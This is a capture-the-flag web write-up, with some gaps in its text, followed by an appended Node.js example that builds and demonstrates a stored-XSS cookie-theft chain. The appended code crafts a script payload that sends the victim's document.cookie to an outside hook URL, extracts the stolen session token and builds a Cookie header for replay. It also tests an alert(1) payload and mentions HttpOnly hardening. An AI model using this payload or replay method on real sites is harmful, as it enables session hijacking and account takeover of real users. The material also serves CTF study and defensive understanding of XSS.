/robots.txt has some Disallow entries:
User-agent: *
Disallow: /admin
Disallow: /todo
/admin is a rabbit hole.
/todo actually has some info.
Looks like there’s a new feature that hasn’t been sufficiently tested for security holes.
Register an account to get a look at the members' area.
So we can upload a resume or send a request to the admin? Maybe that's the form being talked about in
Let's test this by sending an XSS payload in the content field:
<script>alert(1)</script>
Interesting, we can review the report? Let's see if our XSS fired!
So XSS is in play. If the admin is reviewing these requests, maybe we can steal their session cookie?
I'm going to use hookbin and this payload:
Sending that as the content of our request, let’s see if we get anything on our
Is that the cookie we want? Let's see what happens if we use that one instead of the one we have.
Now we can capture the flag :)
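To make the cookie-theft steps above concrete, here is an added example (not part of this writeup, and not the payload the author used). It is a Node.js model of the whole chain: the stored payload that goes into the content field, what the admin's browser does when the report is rendered, what arrives at the hook, and the header to replay. The hook URL, cookie names and values are made up for the demonstration. It also covers the check a practitioner should do first: document.cookie never exposes a cookie flagged HttpOnly, so the same payload steals nothing useful if the session cookie is hardened.

```javascript
// Added example, not from the original writeup. The hook URL below is an
// assumed placeholder, not a real hookbin endpoint.
const HOOK_URL = "https://hookb.in/EXAMPLE";

// Payload to drop into the content field. When the admin reviews the report
// the browser executes it and requests HOOK_URL with document.cookie in the query.
function buildExfilPayload(hookUrl) {
  return `<script>new Image().src="${hookUrl}?c="+encodeURIComponent(document.cookie);</script>`;
}

// What document.cookie exposes: name=value pairs, minus anything marked HttpOnly.
function visibleCookieString(cookies) {
  return cookies
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// Simulate the admin's browser rendering the stored payload. The script body is
// run with a fake document and a fake Image that records every src it is given,
// which stands in for the outbound GET a real browser would send to the hook.
function simulateVictim(payloadHtml, cookies) {
  const requests = [];
  const fakeDocument = { cookie: visibleCookieString(cookies) };
  class FakeImage {
    set src(url) {
      requests.push(url);
    }
  }
  const m = /<script>([\s\S]*?)<\/script>/i.exec(payloadHtml);
  if (!m) return requests;
  new Function("document", "Image", m[1])(fakeDocument, FakeImage);
  return requests;
}

// Hook side: pull the cookie string back out of the captured request URL.
function extractCookieFromHook(requestUrl) {
  return new URL(requestUrl).searchParams.get("c");
}

// Turn the stolen cookie string into the header to replay (curl -H or a proxy).
function replayHeader(cookieString) {
  return { Cookie: cookieString };
}

// Constructed sample data: the admin's cookie jar in two configurations.
const ADMIN_COOKIES_WEAK = [
  { name: "session", value: "admin-session-token", httpOnly: false },
  { name: "theme", value: "dark", httpOnly: false },
];
const ADMIN_COOKIES_HARDENED = [
  { name: "session", value: "admin-session-token", httpOnly: true },
  { name: "theme", value: "dark", httpOnly: false },
];

// Run the full chain and return everything an operator would look at.
function runScenario(cookies) {
  const payload = buildExfilPayload(HOOK_URL);
  const hits = simulateVictim(payload, cookies);
  const stolen = hits.length ? extractCookieFromHook(hits[0]) : null;
  return { payload, hits, stolen, header: stolen ? replayHeader(stolen) : null };
}

console.log("weak cookies:", runScenario(ADMIN_COOKIES_WEAK));
console.log("hardened cookies:", runScenario(ADMIN_COOKIES_HARDENED));
```

In the weak configuration the hook receives the session token and the returned Cookie header is what you would send in place of your own. In the hardened configuration only theme=dark reaches the hook, which is the signal to stop chasing cookies and make the admin's browser perform actions for you instead.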